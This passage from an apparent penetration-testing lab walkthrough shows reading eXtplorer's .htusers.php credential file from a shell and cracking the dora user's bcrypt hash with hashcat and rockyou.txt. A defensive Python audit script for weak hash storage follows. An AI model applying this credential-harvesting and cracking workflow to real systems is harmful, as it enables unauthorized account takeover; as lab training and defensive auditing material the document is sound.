Configuration Files
Checking for credentials in configuration files after performing a manual system enumeration
Since the WordPress instance hasn’t even been set up, there is nothing there.
www-data@dora:/var/www/html/filemanager/config$ ll
total 36K
4.0K -rw-r--r-- 1 www-data www-data 413 Apr 6 2023 .htusers.php
4.0K drwxr-xr-x 2 www-data www-data 4.0K Apr 6 2023 .
4.0K -rw-rw-r-- 1 www-data www-data 99 Apr 6 2023 bookmarks_extplorer_admin.php
4.0K drwxr-xr-x 11 www-data www-data 4.0K Apr 6 2023 ..
4.0K -rw-r--r-- 1 www-data www-data 3.0K Jan 6 2022 conf.php
8.0K -rw-r--r-- 1 www-data www-data 7.7K Jan 6 2022 mimes.php
4.0K -rw-r--r-- 1 www-data www-data 15 Feb 23 2016 .htaccess
4.0K -rw-r--r-- 1 www-data www-data 44 Feb 23 2016 index.html
.htusers.php
www-data@dora:/var/www/html/filemanager/config$ cat .htusers.php
<?php
// ensure this file is being included by a parent file
if( !defined( '_JEXEC' ) && !defined( '_VALID_MOS' ) ) die( 'Restricted access' );
$GLOBALS["users"]=array(
array('admin','21232f297a57a5a743894a0e4a801fc3','/var/www/html','http://localhost','1','','7',1),
array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),
);
That appears to be the credential hash for the dora user.
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat --show dora.hash
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat -a 0 -m 3200 dora.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS:doraemon
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/C...T7CjjS
Time.Started.....: Wed Mar 26 11:24:13 2025 (2 secs)
Time.Estimated...: Wed Mar 26 11:24:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 894 H/s (4.77ms) @ Accel:12 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1584/14344385 (0.01%)
Rejected.........: 0/1584 (0.00%)
Restore.Point....: 1440/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:248-256
Candidate.Engine.: Device Generator
Candidates.#1....: rachelle -> danilo
Hardware.Mon.#1..: Util: 88%
Started: Wed Mar 26 11:24:09 2025
Stopped: Wed Mar 26 11:24:16 2025
Password hash cracked for the dora user: doraemon
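From the defender's side, the same .htusers.php file can be audited for weak hash storage before someone else reads it. The Python sketch below is an added example, not part of the original write-up or eXtplorer's own code; it assumes the first two fields of each row are the username and stored hash, and the minimum bcrypt cost of 10 is an assumed policy value.

```python
import re

# Assumed policy threshold for bcrypt cost; tune to your own baseline.
MIN_BCRYPT_COST = 10

# One user row looks like array('name','hash',...); only the first two
# fields are read (assumed to be username and stored hash).
ROW = re.compile(r"array\(\s*'([^']*)'\s*,\s*'([^']*)'")
BCRYPT = re.compile(r"^\$2[abxy]?\$(\d{2})\$[./A-Za-z0-9]{53}$")
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def classify(stored):
    """Return (scheme, finding) for one stored hash string."""
    m = BCRYPT.match(stored)
    if m:
        cost = int(m.group(1))
        if cost < MIN_BCRYPT_COST:
            return "bcrypt", f"cost {cost} is below policy minimum {MIN_BCRYPT_COST}"
        return "bcrypt", "ok"
    if HEX32.match(stored):
        return "hex32", "unsalted 32-hex digest (MD5-shaped); migrate to bcrypt"
    return "unknown", "unrecognised format; review manually"


def audit(php_source):
    """Return [(user, scheme, finding), ...] for every row in the file."""
    return [(user, *classify(h)) for user, h in ROW.findall(php_source)]


# Sample input: the two rows from the .htusers.php listing on this page.
SAMPLE = r"""
$GLOBALS["users"]=array(
array('admin','21232f297a57a5a743894a0e4a801fc3','/var/www/html','http://localhost','1','','7',1),
array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),
);
"""

if __name__ == "__main__":
    for user, scheme, finding in audit(SAMPLE):
        print(f"{user:8} {scheme:8} {finding}")
```

Both rows are flagged: the admin entry as a bare 32-hex digest and the dora entry for its bcrypt cost of 8. A cost factor only slows guessing, so a password that appears in a common wordlist still falls regardless of the scheme.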
Validating